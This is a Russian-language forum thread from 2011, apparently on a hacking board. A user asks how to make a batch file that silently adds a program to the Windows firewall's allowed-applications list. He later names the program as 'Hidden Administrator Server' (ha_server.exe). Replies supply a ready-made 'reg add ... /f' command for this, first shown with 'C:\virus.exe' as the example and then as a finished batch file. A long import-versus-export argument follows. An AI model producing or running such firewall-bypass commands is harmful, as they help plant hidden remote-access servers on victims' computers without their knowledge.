Импорт в реестер...с помощю bat файла.

Discussion in 'С/С++, C#, Rust, Swift, Go, Java, Perl, Ruby' started by art22, 21 May 2011.

  1. art22

    art22 New Member

    Joined:
    13 May 2011
    Messages:
    44
    Likes Received:
    0
    Reputations:
    0
    Здравствуйте! хочу создать bat файл, который автоматический импортирует в реестер нужный мне файл в фоновом режиме, скажем, нажал на bat файл и все! он записался в реестор... ничего не надо подтверждать... немогу никак найти как сделать(
    вот

    [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\]
    "C:\\Documents and Settings\\файл.exe"="C:\\Documents and Settings\\файл.exe:*:Enabled:название"

    это в xp, а в виндовс 7 так же сделать или как?
     
  2. Gar|k

    Gar|k Moderator

    Joined:
    20 Mar 2009
    Messages:
    1,166
    Likes Received:
    266
    Reputations:
    82
    Нужно открыть курсы "Как найти нужную информацию в интернете? Узнай как эффективно использовать поисковые системы!"...
     
    _________________________
  3. art22

    art22 New Member

    Joined:
    13 May 2011
    Messages:
    44
    Likes Received:
    0
    Reputations:
    0
    я искал много чего перепробувал решил у вас узнать срочно надо! за ранее большое спасибо!
     
  4. not4me

    not4me New Member

    Joined:
    15 Dec 2010
    Messages:
    28
    Likes Received:
    1
    Reputations:
    0
    это ж каким извращенцем надо быть, что бы пихать весь ехе в реестр...

    Хотя зависит от целей.

    Стандартный пример записываешь директорию:

    using Microsoft.Win32;

    RegistryKey saveKey = Registry.LocalMachine.CreateSubKey("software\\.....");
    saveKey.SetValue("имя ключа","данные которые хочешь записать");
    saveKey.Close();

    Вытаскиваешь ехе

    using Microsoft.Win32;

    RegistryKey readKey = Registry.LocalMachine.OpenSubKey("software\\.....");
    string loadString = (string)readKey.GetValue("имя ключа");
    readKey.Close();

    Делаешь открытие по loadString...

    Вариант №2 для извращенцев:)

    ехе в байты -> к стрингу -> запись всего это в реестр -> вытаскивание ключа со строкой -> преобразование в байты -> преобразование масива байтов в ехе
     
  5. seosimf

    seosimf Member

    Joined:
    3 Mar 2011
    Messages:
    271
    Likes Received:
    44
    Reputations:
    6
    @not4me что то я не вижу что бы ТС упоминал шарп, или на чем горазды на том и рады? И про какое "запихивания целого файла в реестр" идет речь?
     
  6. altblitz

    altblitz Elder - Старейшина

    Joined:
    5 Jun 2009
    Messages:
    3,696
    Likes Received:
    3,144
    Reputations:
    236
    Есть такое в самом в reg32 - Import/Export веток регистра.

    Сливал, и текст-редактором делалось Поиск/Замена.

    Цель была - замена дефолтных фолдеров Win на Lin названия,
    /bin, /home.

    Кровь, пот и слёзы.
     
  7. slesh

    slesh Elder - Старейшина

    Joined:
    5 Mar 2007
    Messages:
    2,702
    Likes Received:
    1,224
    Reputations:
    455
    1) regedit с параметров -s имяфайла сделает что тебе надо
    2) т.к. пишешь в HKEY_LOCAL_MACHINE то на Win 7 и Win Vista тебе понадобится повышенный уровень UAC. И если UAC на отключен, то по любому выскочит его окошко, а если не выскачит, что ничего не запишется.
     
  8. DooD

    DooD Elder - Старейшина

    Joined:
    30 Sep 2010
    Messages:
    1,168
    Likes Received:
    450
    Reputations:
    288
    воспользуйся командой reg в консоли можешь почитать хелп,там все доступно изложено.
    вот как то так будет
    reg add hklm\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List /v "C:\virus.exe" /t REG_SZ /d "C:\virus.exe:*:Enabled:virus" /f
     
    #8 DooD, 21 May 2011
    Last edited: 21 May 2011
  9. art22

    art22 New Member

    Joined:
    13 May 2011
    Messages:
    44
    Likes Received:
    0
    Reputations:
    0
    DooD
    я добавил свои параметры и сохранил в bat что то не получилось(

    вот код:

    [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\]
    "C:\\Documents and Settings\\ha_server.exe"="C:\\Documents and Settings\\ha_server.exe:*:Enabled:Hidden Administrator Server"

    как нужно правильно сделать?
     
  10. DooD

    DooD Elder - Старейшина

    Joined:
    30 Sep 2010
    Messages:
    1,168
    Likes Received:
    450
    Reputations:
    288
    короче,вот как выглядит батник:

    reg add hklm\SYSTEM\ControlSet001\Services\S haredAccess\Parameters\FirewallPolicy\StandardProf ile\AuthorizedApplications\List /v "C:\Documents and Settings\ha_server.exe" /t REG_SZ /d "C:\Documents and Settings\ha_server.exe:*:Enabled:Hidden Administrator Server" /f
    pause

    скопируй и возрадуйся:)
    все.
     
    #10 DooD, 22 May 2011
    Last edited: 22 May 2011
  11. kakeolala

    kakeolala Banned

    Joined:
    13 Jul 2010
    Messages:
    118
    Likes Received:
    2
    Reputations:
    0
    оффтоп - это не импорт в реестр, а экспорт
     
  12. DooD

    DooD Elder - Старейшина

    Joined:
    30 Sep 2010
    Messages:
    1,168
    Likes Received:
    450
    Reputations:
    288
    экспорт это сохранение ветки или параметра из реестра как правило в reg файл.а импорт это внесение В реестр.так что оффтоп написал ты.
     
  13. kakeolala

    kakeolala Banned

    Joined:
    13 Jul 2010
    Messages:
    118
    Likes Received:
    2
    Reputations:
    0
    тоесть импорт по твоему это:"который автоматически импортирует в реестр нужный мне фаил" ??

    Ему надо файл -> реестр - это товарисчь как-раз таки и есть экспорт :)
     
  14. AlexTheC0d3r

    AlexTheC0d3r Elder - Старейшина

    Joined:
    25 Jul 2008
    Messages:
    388
    Likes Received:
    179
    Reputations:
    18
    импорт = загрузить куда-то
    экспорт = сохранить откуда-то

    это как-раз таки импорт
     
  15. altblitz

    altblitz Elder - Старейшина

    Joined:
    5 Jun 2009
    Messages:
    3,696
    Likes Received:
    3,144
    Reputations:
    236
    И никак иначе.

    Спор перетёк в выяснение личных отношений.

    Попробуйте выполнить Export, затем Import - всё наглядно и понятно.
     
  16. kakeolala

    kakeolala Banned

    Joined:
    13 Jul 2010
    Messages:
    118
    Likes Received:
    2
    Reputations:
    0
    тоесть если я хочу из россии продать что-то в америку - я им импортирую чтоль свой товар.

    Ему надо - фаил в реестр, это экспорт файла в реестр.
    Если бы надо простой текст в реестр засунуть ( НЕ ФАЙЛ! А ТЕКСТ! ) то это был бы импорт уже
     
  17. DooD

    DooD Elder - Старейшина

    Joined:
    30 Sep 2010
    Messages:
    1,168
    Likes Received:
    450
    Reputations:
    288
    вот это ты мочишь я те отвечаю...причем тут файл или нет?реестр это база данных своего рода,которая содержит информацию,или ты думаешь в нем файлы хранятся как на винте?
     
  18. kakeolala

    kakeolala Banned

    Joined:
    13 Jul 2010
    Messages:
    118
    Likes Received:
    2
    Reputations:
    0
    Вотс мотри. У тебя есть БД на локальном компе.
    1) Я тебе скидываю файл, и ты его грузишь например коммандой:"C:\1.db mysql\base#1" ну типа грузишь мой файл в свою БД. Это разве не экспорт файла ? Экспорт!

    2) А если я тебе скидываю в ЛС протой текст, и ты уже го добавляешь в свою БД через интерфейс - это что тогда будет ? Это будет импорт.

    ТС'у надо первый вариант - файл экспортировать в реестр!
     
  19. AlexTheC0d3r

    AlexTheC0d3r Elder - Старейшина

    Joined:
    25 Jul 2008
    Messages:
    388
    Likes Received:
    179
    Reputations:
    18
    Вы с информатикой знакомы?
    Нет, не экспорт.
    текст ничем не отличается от файла!
    Если не врубаешь, лучше промолчи
     
  20. kakeolala

    kakeolala Banned

    Joined:
    13 Jul 2010
    Messages:
    118
    Likes Received:
    2
    Reputations:
    0
    да конечно незнаком - куда мне уж. И программы для работы с БД писал как с MySQL так и с Access ( защита диплома ) А тут какаято информатика.

    1) "C:\1.db MySQL\db#1" (пример)
    2) "Зайти на http://localhost/phpmyadmin/...." (пример)

    В первом случае вы отправляете файл, где из него дастается текст и запихивается строками. Т.е. вы берете фаил и отправляете какой либо программе - это экспорт файла в стороннее приложение
    Во втором случае вы ж евставляете текст и нажимаете:"Добавить", тем самым вы импортируете текст в свои таблицы. Это и есть импорт.


    Просто опираясь на ваши мысли, будет правельно не:"Россия экспортирует свой товар в страны СНГ" а вот так:"СНГ импортирует товар России". Но особое участие принимает Россия т.к. изготаливает товар. И она будет экспортировать товар

    Так же и тут. В файле есть текст - надо фаил отправить на обработку в программу, собственно экспорт!